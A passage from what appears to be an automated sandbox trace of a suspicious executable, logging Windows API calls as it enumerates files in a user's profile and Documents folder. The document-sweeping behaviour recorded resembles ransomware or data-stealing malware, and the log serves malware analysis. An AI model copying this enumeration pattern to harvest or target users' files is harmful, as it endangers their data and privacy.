(in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a0ba80, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x76a0ba80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x73a5ca00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0xdae00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", cAlternateFileName="%LOCAL~1.EXE")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc1f24c0, ftCreationTime.dwHighDateTime=0x1d5b5c2, ftLastAccessTime.dwLowDateTime=0x4c0be680, ftLastAccessTime.dwHighDateTime=0x1d5c02c, ftLastWriteTime.dwLowDateTime=0x4c0be680, ftLastWriteTime.dwHighDateTime=0x1d5c02c, nFileSizeHigh=0x0, nFileSizeLow=0x11af9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-onKqnd5MCC.m4a", cAlternateFileName="-ONKQN~1.M4A")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d660ee0, ftCreationTime.dwHighDateTime=0x1d5bd37, ftLastAccessTime.dwLowDateTime=0xba5f0ae0, ftLastAccessTime.dwHighDateTime=0x1d5c22f, ftLastWriteTime.dwLowDateTime=0xba5f0ae0, ftLastWriteTime.dwHighDateTime=0x1d5c22f, nFileSizeHigh=0x0, nFileSizeLow=0xc992, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3D jV1aW-bMTSH.mp3", cAlternateFileName="3DJV1A~1.MP3")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d8ea40, ftCreationTime.dwHighDateTime=0x1d5bbe9, ftLastAccessTime.dwLowDateTime=0xb91d8e30, ftLastAccessTime.dwHighDateTime=0x1d5b5ce, ftLastWriteTime.dwLowDateTime=0xb91d8e30, ftLastWriteTime.dwHighDateTime=0x1d5b5ce, nFileSizeHigh=0x0, nFileSizeLow=0x145cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3xYK0ZckOZDaaz36qgE.jpg", cAlternateFileName="3XYK0Z~1.JPG")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e248e0, ftCreationTime.dwHighDateTime=0x1d5c0e3, ftLastAccessTime.dwLowDateTime=0x5d27cae0, ftLastAccessTime.dwHighDateTime=0x1d5bdef, ftLastWriteTime.dwLowDateTime=0x5d27cae0, ftLastWriteTime.dwHighDateTime=0x1d5bdef, nFileSizeHigh=0x0, nFileSizeLow=0xed8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4co9lJ.pptx", cAlternateFileName="4CO9LJ~1.PPT")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f92c20, ftCreationTime.dwHighDateTime=0x1d5b68e, ftLastAccessTime.dwLowDateTime=0xb7e79760, ftLastAccessTime.dwHighDateTime=0x1d5c602, ftLastWriteTime.dwLowDateTime=0xb7e79760, ftLastWriteTime.dwHighDateTime=0x1d5c602, nFileSizeHigh=0x0, nFileSizeLow=0x8416, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6sr80q9hh7H4Me.png", cAlternateFileName="6SR80Q~1.PNG")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb82fbaf0, ftCreationTime.dwHighDateTime=0x1d5c3f4, ftLastAccessTime.dwLowDateTime=0x8428c610, ftLastAccessTime.dwHighDateTime=0x1d5bfb8, ftLastWriteTime.dwLowDateTime=0x8428c610, ftLastWriteTime.dwHighDateTime=0x1d5bfb8, nFileSizeHigh=0x0, nFileSizeLow=0x12298, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7doP5kfmX.jpg", cAlternateFileName="7DOP5K~1.JPG")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a6cee90, ftCreationTime.dwHighDateTime=0x1d5b74f, ftLastAccessTime.dwLowDateTime=0xf50306b0, ftLastAccessTime.dwHighDateTime=0x1d5b5d7, ftLastWriteTime.dwLowDateTime=0xf50306b0, ftLastWriteTime.dwHighDateTime=0x1d5b5d7, nFileSizeHigh=0x0, nFileSizeLow=0x58ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="atolbjN.gif", cAlternateFileName="")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdded0fb0, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6ac0a7d0, ftLastAccessTime.dwHighDateTime=0x1d5b8e5, ftLastWriteTime.dwLowDateTime=0x6ac0a7d0, ftLastWriteTime.dwHighDateTime=0x1d5b8e5, nFileSizeHigh=0x0, nFileSizeLow=0x6af8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bYBn.mp4", cAlternateFileName="")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c3e630, ftCreationTime.dwHighDateTime=0x1d5bfbb, ftLastAccessTime.dwLowDateTime=0x7153f550, ftLastAccessTime.dwHighDateTime=0x1d5c59e, ftLastWriteTime.dwLowDateTime=0x7153f550, ftLastWriteTime.dwHighDateTime=0x1d5c59e, nFileSizeHigh=0x0, nFileSizeLow=0xf715, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cSYYXp.gif", cAlternateFileName="")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3faee7e0, ftCreationTime.dwHighDateTime=0x1d5c5d9, ftLastAccessTime.dwLowDateTime=0x927ce520, ftLastAccessTime.dwHighDateTime=0x1d5b9dc, ftLastWriteTime.dwLowDateTime=0x927ce520, ftLastWriteTime.dwHighDateTime=0x1d5b9dc, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edcuZL9YV.odt", cAlternateFileName="EDCUZL~1.ODT")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa20b7dc0, ftCreationTime.dwHighDateTime=0x1d5b997, ftLastAccessTime.dwLowDateTime=0xce02fd80, ftLastAccessTime.dwHighDateTime=0x1d5bd30, ftLastWriteTime.dwLowDateTime=0xce02fd80, ftLastWriteTime.dwHighDateTime=0x1d5bd30, nFileSizeHigh=0x0, nFileSizeLow=0xb666, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fgRRfm56VFVs.avi", cAlternateFileName="FGRRFM~1.AVI")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee507c0, ftCreationTime.dwHighDateTime=0x1d5c282, ftLastAccessTime.dwLowDateTime=0x581662a0, ftLastAccessTime.dwHighDateTime=0x1d5c272, ftLastWriteTime.dwLowDateTime=0x581662a0, ftLastWriteTime.dwHighDateTime=0x1d5c272, nFileSizeHigh=0x0, nFileSizeLow=0x168bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G1XIoiutIi.mp3", cAlternateFileName="G1XIOI~1.MP3")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc277f0e0, ftCreationTime.dwHighDateTime=0x1d5b945, ftLastAccessTime.dwLowDateTime=0x480dc750, ftLastAccessTime.dwHighDateTime=0x1d5c591, ftLastWriteTime.dwLowDateTime=0x480dc750, ftLastWriteTime.dwHighDateTime=0x1d5c591, nFileSizeHigh=0x0, nFileSizeLow=0xee02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hq9LaKRv4rTXnAj.mp4", cAlternateFileName="HQ9LAK~1.MP4")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19859800, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0x538d6d50, ftLastAccessTime.dwHighDateTime=0x1d5be7b, ftLastWriteTime.dwLowDateTime=0x538d6d50, ftLastWriteTime.dwHighDateTime=0x1d5be7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HuRLDatxCVujdx", cAlternateFileName="HURLDA~1")) returned 1 [0091.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4988 [0091.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db18 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c70480, ftCreationTime.dwHighDateTime=0x1d5c2d9, ftLastAccessTime.dwLowDateTime=0xbe82a4e0, ftLastAccessTime.dwHighDateTime=0x1d5c1d7, ftLastWriteTime.dwLowDateTime=0xbe82a4e0, ftLastWriteTime.dwHighDateTime=0x1d5c1d7, nFileSizeHigh=0x0, nFileSizeLow=0x80a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iKQxeuzCSevEnfmn0gcx.mkv", cAlternateFileName="IKQXEU~1.MKV")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2a50, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0xa1b6cd00, ftLastAccessTime.dwHighDateTime=0x1d5b7f5, ftLastWriteTime.dwLowDateTime=0xa1b6cd00, ftLastWriteTime.dwHighDateTime=0x1d5b7f5, nFileSizeHigh=0x0, nFileSizeLow=0x68da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iueS2lmfYi1KxXP3HbP.m4a", cAlternateFileName="IUES2L~1.M4A")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1631cb00, ftCreationTime.dwHighDateTime=0x1d5be2f, ftLastAccessTime.dwLowDateTime=0xdc80c20, ftLastAccessTime.dwHighDateTime=0x1d5bc74, ftLastWriteTime.dwLowDateTime=0xdc80c20, ftLastWriteTime.dwHighDateTime=0x1d5bc74, nFileSizeHigh=0x0, nFileSizeLow=0x10a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mDpwW.png", cAlternateFileName="")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823b2a30, ftCreationTime.dwHighDateTime=0x1d5bbc3, ftLastAccessTime.dwLowDateTime=0x696989c0, ftLastAccessTime.dwHighDateTime=0x1d5be6b, ftLastWriteTime.dwLowDateTime=0x696989c0, ftLastWriteTime.dwHighDateTime=0x1d5be6b, nFileSizeHigh=0x0, nFileSizeLow=0x1680d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O-_yybE0jRAzBusLRG.rtf", cAlternateFileName="O-_YYB~1.RTF")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeba0e830, ftCreationTime.dwHighDateTime=0x1d5be5b, ftLastAccessTime.dwLowDateTime=0xd751c870, ftLastAccessTime.dwHighDateTime=0x1d5be2b, ftLastWriteTime.dwLowDateTime=0xd751c870, ftLastWriteTime.dwHighDateTime=0x1d5be2b, nFileSizeHigh=0x0, nFileSizeLow=0x104d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OEL7b8_7aVATtdQDgj.flv", cAlternateFileName="OEL7B8~1.FLV")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x289b69a0, ftCreationTime.dwHighDateTime=0x1d5c5f9, ftLastAccessTime.dwLowDateTime=0xbbcb8a70, ftLastAccessTime.dwHighDateTime=0x1d5bf82, ftLastWriteTime.dwLowDateTime=0xbbcb8a70, ftLastWriteTime.dwHighDateTime=0x1d5bf82, nFileSizeHigh=0x0, nFileSizeLow=0x12d21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p9_9SN.jpg", cAlternateFileName="")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cf8b90, ftCreationTime.dwHighDateTime=0x1d5c4a4, ftLastAccessTime.dwLowDateTime=0xb0019700, ftLastAccessTime.dwHighDateTime=0x1d5bcbe, ftLastWriteTime.dwLowDateTime=0xb0019700, ftLastWriteTime.dwHighDateTime=0x1d5bcbe, nFileSizeHigh=0x0, nFileSizeLow=0x7d7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pA5hO5i.wav", cAlternateFileName="")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fe380, ftCreationTime.dwHighDateTime=0x1d5c112, ftLastAccessTime.dwLowDateTime=0xca41c340, ftLastAccessTime.dwHighDateTime=0x1d5c4e5, ftLastWriteTime.dwLowDateTime=0xca41c340, ftLastWriteTime.dwHighDateTime=0x1d5c4e5, nFileSizeHigh=0x0, nFileSizeLow=0x69a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pOX7h1T6RlrYuJGtjF_U.png", cAlternateFileName="POX7H1~1.PNG")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a4282a0, ftCreationTime.dwHighDateTime=0x1d5be33, ftLastAccessTime.dwLowDateTime=0x3c2a49b0, ftLastAccessTime.dwHighDateTime=0x1d5c062, ftLastWriteTime.dwLowDateTime=0x3c2a49b0, ftLastWriteTime.dwHighDateTime=0x1d5c062, nFileSizeHigh=0x0, nFileSizeLow=0x9377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QdJt Sw.wav", cAlternateFileName="QDJTSW~1.WAV")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fb10, ftCreationTime.dwHighDateTime=0x1d5ba97, ftLastAccessTime.dwLowDateTime=0x2dc8e720, ftLastAccessTime.dwHighDateTime=0x1d5c470, ftLastWriteTime.dwLowDateTime=0x2dc8e720, ftLastWriteTime.dwHighDateTime=0x1d5c470, nFileSizeHigh=0x0, nFileSizeLow=0x9816, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quat5yQtAQx60X5AadT.mp4", cAlternateFileName="QUAT5Y~1.MP4")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87c64720, ftCreationTime.dwHighDateTime=0x1d5bca2, ftLastAccessTime.dwLowDateTime=0xe6c4c030, ftLastAccessTime.dwHighDateTime=0x1d5bb1c, ftLastWriteTime.dwLowDateTime=0xe6c4c030, ftLastWriteTime.dwHighDateTime=0x1d5bb1c, nFileSizeHigh=0x0, nFileSizeLow=0xa9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ThK4acWZ27MnszTc2.pptx", cAlternateFileName="THK4AC~1.PPT")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b271800, ftCreationTime.dwHighDateTime=0x1d5be47, ftLastAccessTime.dwLowDateTime=0x40c3a880, ftLastAccessTime.dwHighDateTime=0x1d5c342, ftLastWriteTime.dwLowDateTime=0x40c3a880, ftLastWriteTime.dwHighDateTime=0x1d5c342, nFileSizeHigh=0x0, nFileSizeLow=0x1239c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U1_x0Mr1zKGTIkq.m4a", cAlternateFileName="U1_X0M~1.M4A")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ab9f3a0, ftCreationTime.dwHighDateTime=0x1d5b6a6, ftLastAccessTime.dwLowDateTime=0x920d2b40, ftLastAccessTime.dwHighDateTime=0x1d5c580, ftLastWriteTime.dwLowDateTime=0x920d2b40, ftLastWriteTime.dwHighDateTime=0x1d5c580, nFileSizeHigh=0x0, nFileSizeLow=0x1191a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W3jMO.gif", cAlternateFileName="")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab68e340, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x90a3c590, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0x90a3c590, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x2663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wQWF.mp3", cAlternateFileName="")) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ba7e40, ftCreationTime.dwHighDateTime=0x1d5bdbd, ftLastAccessTime.dwLowDateTime=0xe3f57330, ftLastAccessTime.dwHighDateTime=0x1d5bad2, ftLastWriteTime.dwLowDateTime=0xe3f57330, ftLastWriteTime.dwHighDateTime=0x1d5bad2, nFileSizeHigh=0x0, nFileSizeLow=0x15d97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xfD1AXfX.mp4", cAlternateFileName="")) returned 1 [0091.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d5189f0, ftCreationTime.dwHighDateTime=0x1d5bb1d, ftLastAccessTime.dwLowDateTime=0xc5c3e3c0, ftLastAccessTime.dwHighDateTime=0x1d5c5cb, ftLastWriteTime.dwLowDateTime=0xc5c3e3c0, ftLastWriteTime.dwHighDateTime=0x1d5c5cb, nFileSizeHigh=0x0, nFileSizeLow=0xd706, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YhmCkoT6ZnchGJfJ-Z.odt", cAlternateFileName="YHMCKO~1.ODT")) returned 1 [0091.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c637c0, ftCreationTime.dwHighDateTime=0x1d5b60e, ftLastAccessTime.dwLowDateTime=0x81246f30, ftLastAccessTime.dwHighDateTime=0x1d5c2b7, ftLastWriteTime.dwLowDateTime=0x81246f30, ftLastWriteTime.dwHighDateTime=0x1d5c2b7, nFileSizeHigh=0x0, nFileSizeLow=0x17fe1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yx6 GdWti8.jpg", cAlternateFileName="YX6GDW~1.JPG")) returned 1 [0091.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35037180, ftCreationTime.dwHighDateTime=0x1d5c05c, ftLastAccessTime.dwLowDateTime=0x1740b7e0, ftLastAccessTime.dwHighDateTime=0x1d5c2ee, ftLastWriteTime.dwLowDateTime=0x1740b7e0, ftLastWriteTime.dwHighDateTime=0x1d5c2ee, nFileSizeHigh=0x0, nFileSizeLow=0x1013e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zsuP1kmCK5.bmp", cAlternateFileName="ZSUP1K~1.BMP")) returned 1 [0091.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38828410, ftCreationTime.dwHighDateTime=0x1d5bec5, ftLastAccessTime.dwLowDateTime=0x56b1ff50, ftLastAccessTime.dwHighDateTime=0x1d5be4e, ftLastWriteTime.dwLowDateTime=0x56b1ff50, ftLastWriteTime.dwHighDateTime=0x1d5be4e, nFileSizeHigh=0x0, nFileSizeLow=0x10fda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyE WC9uJ8lrpGI.mp3", cAlternateFileName="ZYEWC9~1.MP3")) returned 1 [0091.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38828410, ftCreationTime.dwHighDateTime=0x1d5bec5, ftLastAccessTime.dwLowDateTime=0x56b1ff50, ftLastAccessTime.dwHighDateTime=0x1d5be4e, ftLastWriteTime.dwLowDateTime=0x56b1ff50, ftLastWriteTime.dwHighDateTime=0x1d5be4e, nFileSizeHigh=0x0, nFileSizeLow=0x10fda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyE WC9uJ8lrpGI.mp3", cAlternateFileName="ZYEWC9~1.MP3")) returned 0 [0091.011] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.011] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0091.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.011] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.011] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.011] PathFindFileNameW (pszPath="") returned="" [0091.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0091.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f914cd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f914cd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f914cd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f914cd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea259f0, ftCreationTime.dwHighDateTime=0x1d579db, ftLastAccessTime.dwLowDateTime=0x381b76e0, ftLastAccessTime.dwHighDateTime=0x1d5454d, ftLastWriteTime.dwLowDateTime=0x381b76e0, ftLastWriteTime.dwHighDateTime=0x1d5454d, nFileSizeHigh=0x0, nFileSizeLow=0x919f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7DRI_.docx", cAlternateFileName="7DRI_~1.DOC")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5fb70, ftCreationTime.dwHighDateTime=0x1d5b925, ftLastAccessTime.dwLowDateTime=0x799ac810, ftLastAccessTime.dwHighDateTime=0x1d5bb12, ftLastWriteTime.dwLowDateTime=0x799ac810, ftLastWriteTime.dwHighDateTime=0x1d5bb12, nFileSizeHigh=0x0, nFileSizeLow=0x8e2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8_akOq5K7U9Vl.doc", cAlternateFileName="8_AKOQ~1.DOC")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x769e4600, ftCreationTime.dwHighDateTime=0x1d58c64, ftLastAccessTime.dwLowDateTime=0xa907c4c0, ftLastAccessTime.dwHighDateTime=0x1d53c70, ftLastWriteTime.dwLowDateTime=0xa907c4c0, ftLastWriteTime.dwHighDateTime=0x1d53c70, 